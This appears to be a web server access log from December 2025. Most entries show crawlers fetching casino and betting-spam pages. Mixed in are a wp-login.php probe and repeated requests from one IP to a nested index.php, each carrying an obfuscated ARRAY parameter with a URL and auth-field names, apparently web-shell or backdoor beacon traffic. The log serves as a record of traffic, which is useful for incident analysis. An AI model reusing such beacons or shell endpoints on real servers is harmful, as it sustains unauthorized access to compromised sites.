217.113.194.157 - - [19/Dec/2025:12:26:14 +0000] "GET /1vin-10/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.160 - - [19/Dec/2025:12:26:30 +0000] "GET /1vin-540/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:26:32 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303634372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373034372q6462346332633131323663366332353237323662656232333563336265373065222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.232 - - [19/Dec/2025:12:26:45 +0000] "GET /1vin-188/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:26:52 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303636372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373036372q3338373463633432386566633733653266343435343965636638393830613866222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
193.36.38.94 - - [19/Dec/2025:12:26:59 +0000] "GET /wp-login.php HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
217.113.194.153 - - [19/Dec/2025:12:27:01 +0000] "GET /1vin-763/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
66.249.68.134 - - [19/Dec/2025:12:27:10 +0000] "GET /?_g=2008310 HTTP/1.1" 200 193902 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.198.77.92 - - [19/Dec/2025:12:27:12 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303638372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373038372q3035346336366332306464383166636566313631616633313261326438633863222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.152 - - [19/Dec/2025:12:27:16 +0000] "GET /1vin-323/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
2a03:2880:f800:28:: - - [19/Dec/2025:12:27:18 +0000] "GET /?m=29513166958004 HTTP/1.1" 500 0 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
159.198.77.92 - - [19/Dec/2025:12:27:32 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303730372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373130372q3536333838623066346339383238393062376136386435646335653733326135222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.153 - - [19/Dec/2025:12:27:32 +0000] "GET /1vin-22/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.153 - - [19/Dec/2025:12:27:48 +0000] "GET /1vin-925/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:27:52 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303732372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373132372q6539303532383665316437633935353663386266613235326438656665343365222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.158 - - [19/Dec/2025:12:28:03 +0000] "GET /1-win-101/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
185.191.171.3 - - [19/Dec/2025:12:28:04 +0000] "GET /tag/clubhouse-casino-login/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:05 +0000] "GET /%EF%B8%8F-16-luchshih-kursov-trejdinga-2025-besplatno-i/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:09 +0000] "GET /1win-%EB%A8%B9%ED%8A%80-857/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
159.198.77.92 - - [19/Dec/2025:12:28:12 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303734372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373134372q6231626637393535623837363033353062376438323465373338363061653131222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:15 +0000] "GET /1win-%EB%B3%B4%EB%84%88%EC%8A%A4-%EC%82%AC%EC%9A%A9%EB%B2%95-658/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.113.194.233 - - [19/Dec/2025:12:28:19 +0000] "GET /1-win-322/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:20 +0000] "GET /1win-%ED%9B%84%EA%B8%B0-448/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:24 +0000] "GET /20bet-%CE%B5%CE%B9%CF%83%CE%BF%CE%B4%CE%BF%CF%82-615/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2a03:2880:f800:: - - [19/Dec/2025:12:28:24 +0000] "GET /?m=6611642390802 HTTP/1.1" 500 0 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:28 +0000] "GET /20bet-%CF%84%CE%B7%CE%BB%CE%B5%CF%86%CF%89%CE%BD%CE%BF-%CE%B5%CF%80%CE%B9%CE%BA%CE%BF%CE%B9%CE%BD%CF%89%CE%BD%CE%B9%CE%B1%CF%82-474/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
159.198.77.92 - - [19/Dec/2025:12:28:32 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303736372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373136372q6430643139666430363434353637326535633131313439653736393732373861222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:33 +0000] "GET /category/20bet-%CE%B5%CE%B9%CF%83%CE%BF%CE%B4%CE%BF%CF%82-513/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.113.194.156 - - [19/Dec/2025:12:28:34 +0000] "GET /1-win-176/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:37 +0000] "GET /mostbet-%D8%AA%D9%86%D8%B2%D9%8A%D9%84-235/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:41 +0000] "GET /tag/%D0%BC%D0%BE%D1%81%D1%82%D0%B1%D0%B5%D1%82-%D0%B2%D1%85%D0%BE%D0%B4/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:45 +0000] "GET /tag/%D0%BC%D0%BE%D1%81%D1%82%D0%B1%D0%B5%D1%82-%D0%BA%D0%B0%D0%B7%D0%B8%D0%BD%D0%BE-%D0%BA%D0%B0%D0%B7%D0%B0%D1%85%D1%81%D1%82%D0%B0%D0%BD/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:49 +0000] "GET /tag/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-1win/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.113.194.153 - - [19/Dec/2025:12:28:50 +0000] "GET /1-win-130/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:28:52 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303738372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373138372q6430303132333539353066323636633836306361656430616461396433626463222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:53 +0000] "GET /tag/%D8%AA%D8%AD%D9%85%D9%8A%D9%84-mostbet/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:28:57 +0000] "GET /tag/1win-%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:29:01 +0000] "GET /tag/1win-%D8%AA%D8%AD%D9%85%D9%8A%D9%84/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:29:06 +0000] "GET /tag/1win-kz-%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.113.194.233 - - [19/Dec/2025:12:29:06 +0000] "GET /1-win-32/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:29:09 +0000] "GET /tag/20bet-%CE%B5%CE%B9%CF%83%CE%BF%CE%B4%CE%BF%CF%82/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
159.198.77.92 - - [19/Dec/2025:12:29:12 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303830372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373230372q3963666236623763336337396336633338373465353762653239386138323831222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:29:13 +0000] "GET /tag/mostbet-%D0%BF%D1%80%D0%BE%D0%BC%D0%BE%D0%BA%D0%BE%D0%B4/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:29:17 +0000] "GET /tag/mostbet-%D1%80%D0%B5%D0%B3%D0%B8%D1%81%D1%82%D1%80%D0%B0%D1%86%D0%B8%D1%8F/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.113.194.158 - - [19/Dec/2025:12:29:21 +0000] "GET /category/worldwide/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:29:21 +0000] "GET /tag/mostbet-%D0%B7%D0%B5%D1%80%D0%BA%D0%B0%D0%BB%D0%BE/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.68.132 - - [19/Dec/2025:12:29:22 +0000] "GET /?_g=2674051 HTTP/1.1" 200 190815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2001:41d0:303:98bd::1 - - [19/Dec/2025:12:29:25 +0000] "GET /tag/mostbet-%D0%BA%D0%B0%D0%B7%D0%B0%D1%85%D1%81%D1%82%D0%B0%D0%BD/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2a03:2880:f800:36:: - - [19/Dec/2025:12:29:31 +0000] "GET /?m=87210173019304 HTTP/1.1" 500 0 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
159.198.77.92 - - [19/Dec/2025:12:29:32 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303832372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373232372q3039386136623562633532343634386631653461636535643138356433663265222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.158 - - [19/Dec/2025:12:29:37 +0000] "GET /category/casino/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:29:52 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303834372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373234372q3866326662323466373235616238333661346161373965363536643638393766222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.232 - - [19/Dec/2025:12:29:52 +0000] "GET /lemoncasino-101/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
66.249.68.132 - - [19/Dec/2025:12:30:07 +0000] "GET /?_g=2373067 HTTP/1.1" 200 196782 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.113.194.157 - - [19/Dec/2025:12:30:08 +0000] "GET /casino-lemon-41/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:30:12 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303836372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373236372q3965663135393736323361333231393634366165616532323137663664333935222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.157 - - [19/Dec/2025:12:30:24 +0000] "GET /tag/treasure-wild/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
66.249.68.133 - - [19/Dec/2025:12:30:28 +0000] "GET /?_g=1124349 HTTP/1.1" 200 200336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.198.77.92 - - [19/Dec/2025:12:30:32 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303838372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373238372q6333663730313931326265306539616239383338336230323664336437313339222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
46.250.162.255 - - [19/Dec/2025:12:30:35 +0000] "GET /tag/hell-spin-bonus-bez-depozytu/ HTTP/1.1" 500 0 "https://raxmundo.com/tag/hell-spin-bonus-bez-depozytu/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
2a03:2880:f800:25:: - - [19/Dec/2025:12:30:38 +0000] "GET /?m=80822110824800 HTTP/1.1" 500 0 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
217.113.194.154 - - [19/Dec/2025:12:30:39 +0000] "GET /tag/888casino/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:30:52 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303930372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373330372q6538346230373839366233396463306535383466663938356434643933333230222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.232 - - [19/Dec/2025:12:30:55 +0000] "GET /tag/188-bet/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
66.249.68.132 - - [19/Dec/2025:12:31:09 +0000] "GET /?_g=1056424 HTTP/1.1" 200 199722 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
154.54.249.208 - - [19/Dec/2025:12:31:10 +0000] "GET /tag/lemon-casino/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:31:12 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303932372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373332372q6430343032306463633665663433353930376235666331626332346336666537222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
217.113.194.156 - - [19/Dec/2025:12:31:25 +0000] "GET /tag/komunitas/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
159.198.77.92 - - [19/Dec/2025:12:31:32 +0000] "GET /256042/256042/index.php?ARRAY=7o2230223n313736363135303934372p2231223n22687474703n5p2s5p2s7n7335343976313373752r6q6s6463692r6p6s6p5p2s3s6p633q7068705s636s64655s6n6326743q313736363134373334372q3337373236313337643636386637356237343030396463646363653034643661222p2232223n226465663230663162656532323035303235363030363063366530323035303232222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34312q35332q36322q37322q38342q3236227q HTTP/1.1" 200 0 "-" "-"
124.243.186.66 - - [19/Dec/2025:12:31:34 +0000] "GET /mostbet-bet-212/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
217.113.194.155 - - [19/Dec/2025:12:31:41 +0000] "GET /tag/book-of-dead/ HTTP/1.1" 500 0 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
2a03:2880:f800:45:: - - [19/Dec/2025:12:31:44 +0000] "GET /?m=3790889658400 HTTP/1.1" 500 0 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
